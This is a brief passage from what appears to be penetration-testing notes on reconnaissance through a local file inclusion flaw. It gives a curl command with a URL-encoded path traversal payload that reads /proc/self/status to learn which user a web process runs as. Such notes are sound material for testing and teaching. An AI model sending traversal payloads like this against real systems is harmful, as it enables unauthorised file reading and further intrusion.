Alternate Information Gathering Methods

Current User

Example would be if you have LFI or some other means to read from the local file system, this would tell you who the process is running as, allowing you to determine if you can read sensitive files

# Reading /proc/self/status
curl -s 'http://localhost/app?file=..%2f..%2f..%2fproc%2fself%2fstatus'